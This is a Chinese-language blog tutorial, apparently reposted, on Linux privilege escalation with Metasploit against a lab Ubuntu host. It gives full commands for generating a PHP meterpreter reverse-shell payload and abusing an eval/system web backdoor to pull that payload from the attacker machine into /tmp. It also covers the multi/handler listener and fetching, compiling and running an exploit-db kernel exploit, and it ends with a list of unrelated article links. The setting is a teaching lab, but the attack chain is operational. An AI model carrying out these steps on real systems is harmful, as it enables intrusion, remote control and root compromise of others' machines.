当前位置: 首页 > news >正文

Linux提权之metasploit 提权(五)

首先metasploit是什么呢,该怎末使用呢

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代 码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

下边这篇文章告诉哦你

【工具使用】——Metasploit(MSF)使用详解(超详细)-CSDN博客

然后我们呢开始实验

首先准备环境

我们的kail机 ip 192.168.25.138 (这个相信你们都有)

还有上一篇文章的 Ubuntu 主机 ip 192.168.25.135 (这个就是上一篇下载的那个 没有的 我再次放在下边)

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: 33g3

--来自百度网盘超级会员v3的分享

我们首先打开我们的kail机

输入 ifconfig

我们的ip是192.68.25.138

首先我们先要生成攻击载荷

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.25.138 LPORT=12345 -f raw >shell.php

不知道msfvenom 是啥的

msfvenom -p 模板 -e 编码模板 -i 编码次数 -b 避免字符集 LHOST(ifconfig查看) LPORT(监听端口) -f 输出文件类型 > 文件名

参考这一篇文章

msfvenom的使用&免杀&外网渗透_msfvalenem-CSDN博客

我就可以看到桌面上有了shell.php

我们来查看一下源代码

我们的目的 就是要把这个攻击载荷 下载到目标主机上

还是一样的

我们首先要开启80端口服务

python3 -m http.server 80

还是老样子

在我们的本机上windows上输入 192.168.25.135

然后打开eval函数 超链接

输入 system 函数

data=system('ls -al');

然后我们查看上一级目录

data=system('ls -al ../');

我们看到了tmp目录 那个临时目录 是谁都可以访问修改的

那我们就进入tmp目录 等下下载到这个目录里

data=system('ls -al ../tmp');

然后我们还是可以用一个反弹shell 然后输入指令 使用wegt或者curl进行下载

这里我们是php代码 咋们可以用php的一个函数来解决

file_get_contents 它可以本地请求 也可以远程http请求

想了解更多的 我们可以看下一篇文章

file_get_contents() 函数详解与使用_php file get contents-CSDN博客

file_get_contents('http://192.168.25.138/shell.php');

看不到内容 我们可以打印出来

echo file_get_contents('http://192.168.25.138/shell.php');

内容跟我们生成的攻击载荷一摸一样

下载我们就要开始写入文件了

file_put_contents函数

不懂得 可以看这一篇文章

php 读写文件 file_put_contents() 与 file_get_contents() 函数用法-CSDN博客

file_put_contents('../tmp/shell.php',file_get_contents('http://192.168.25.138/shell.php'));

现在让我们来查看Ubuntu主机上 有没有下载好没有这个shell.php文件

data=system('ls -al ../tmp');

然后接下来我们启动kail的msf(这里我就不在过多讲解 msf 相信你们都是业内人士)

msfconsole

然后使用监听模块

use exploit/multi/handler

然后设置payload

set payloadphp/meterpreter_reverse_tcp

输入

show options

查看要添加的参数名称

设置参数

set lhost 192.168.25.138 (kail的ip)

set lport 12345 (设置成为与攻击载荷相同的端口)

然后哦我们输入

run

开始监听

然后我们在我们的本机上输入 来访问shell.php

http://192.168.25.135/tmp/shell.php

然后返回kail 已经有了 meterpreter

大家这里不要管我这里的ip怎末变成了192.168.25.136 而不是192.168.25.135(我这里的ip变换了 大家不用管 就按照原来的走)

输入

getuid 查询当前用户

然后查看主机版本

sysinfo

然后我们进入shell

输入id

查询Ubuntu版本

cat /etc/issue

然后我们退出shell 到 meterpreter

exit

我们也可以使用 msf自带的后渗透模块来查询

run post/multi/recon/local_exploit_suggester

然后等待查询结束

这里没有查询到

然后还是一样的

在这个漏洞库查找

https://www.exploit-db.com/exploits/37292

还是上篇找到的 37292.c

虽然上次没有提权成功 因为这个漏洞不稳定

我们这次再试试

首先进入shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

然后下载

curl http://192.168.25.138/37292.c -o /tmp/37292.c

然后进行编译

gcc 37292.c -o exp

输入

./exp

进行运行

这里还是没有成功 哎 太可惜了 很想给你们运行一遍

反正思路就是这个思路

大家可以找别的版本来运行一遍

相关文章:

  • 登录-07.JWT令牌-登录后下发令牌
  • 编程题-连接两字母单词得到的最长回文串(中等)
  • 从网络基础到安全防护:网安运维小白的入门学习路线
  • python-静态方法和类方法
  • 蓝桥杯训练题目(一)—— 难度:简单(除了最后一题哈)
  • 《Python实战进阶》专栏 No 4:高效、简洁、强大之使用 FastAPI 构建高性能异步API
  • 请简述一下Prefab(预制体)的本质是什么?
  • 大白话TypeScript第三章高级特性学习
  • 使用Socket编写超牛的http服务器和客户端(一)
  • L1-6 剪切粘贴(字符串增删查改)
  • INTJ人格的本质
  • 【JavaScript】《JavaScript高级程序设计 (第4版) 》笔记-Chapter21-错误处理与调试
  • Linux 命令大全完整版(12)
  • apply的用法
  • 自动驾驶中planning为什么要把横纵向分开优化?
  • AI知识架构之RAG
  • 如何在VMware虚拟机的window10系统中安装网易mumu模拟器
  • Linux权限(一)
  • 【Java】求绝对值
  • hive开窗函数边界值ROWS BETWEEN 和 RANGE BETWEEN区别
  • 弘扬 “上海精神”,上合组织政党论坛聚焦政党责任与使命
  • 昆明一小区电梯突然从40楼降到负4楼,回应:临时断电引起
  • “70后”女博士张姿卸任国家国防科技工业局副局长
  • 民政部党组成员、中国老龄协会会长刘振国任民政部副部长
  • 上海4-6月文博美展、剧目演出不断,将开设直播推出文旅优惠套餐
  • 一季度沪苏浙皖GDP增速均快于去年全年,新兴动能持续壮大